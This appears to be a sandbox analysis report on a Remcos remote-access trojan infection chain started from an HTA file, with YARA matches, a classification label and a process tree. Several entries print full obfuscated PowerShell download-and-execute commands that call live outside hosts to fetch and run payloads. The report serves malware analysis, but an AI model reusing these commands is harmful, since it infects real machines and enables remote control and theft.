                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 6128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winHTA@19/18@6/3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0041798D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0040F4AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0041B539
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nicemeetingsofpictureclearthingstobe[1].tiffJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-M3P7YT
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avhm3mxt.kyo.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: LJ1IZDkHyE.htaReversingLabs: Detection: 26%
                      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"Jump to behavior
